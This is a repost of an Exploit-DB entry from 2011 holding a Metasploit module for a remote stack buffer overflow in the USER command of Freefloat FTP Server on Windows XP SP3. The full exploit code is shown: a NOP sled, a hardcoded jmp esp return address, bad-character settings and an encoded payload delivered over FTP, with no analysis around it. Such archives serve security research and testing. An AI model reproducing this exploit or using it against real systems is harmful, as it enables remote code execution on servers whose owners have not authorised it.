Freefloat FTP Server – Remote Buffer Overflow (Metasploit) - 体验盒子

作者： James Fitts

日期： 2011-07-07

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/17498/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = AverageRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})

super(update_info(info,

'Name' => 'Freefloat FTP Server Username Stack Overflow',

'Description'=> %q{

This module exploits a buffer overflow found in the USER command of the Freefloat FTP server.

},

'Author' => [

'0v3r', # Initial Discovery

'James Fitts' # Metasploit Module

],

'License'=> MSF_LICENSE,

'Version'=> '$Revision: $',

'References' =>

[

[ 'URL', 'http://www.exploit-db.com/exploits/15689' ],

],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

},

'Payload'=>

{

'BadChars' => "\x00\x0a\x0d",

},

'Platform' => 'win',

'Targets'=>

[

[ 'Windows XP SP3', { 'Ret' => 0x77def069 } ], # jmp esp from ADVAPI32.dll

],

'DisclosureDate' => 'Dec 05 2010',

'DefaultTarget' => 0))

end

def exploit

connect

print_status("Trying target #{target.name}...")

buf = make_nops(230) + [target.ret].pack('V')

buf << make_nops(50)

buf << payload.encoded

send_cmd( ['USER', buf] , false )

handler

disconnect

end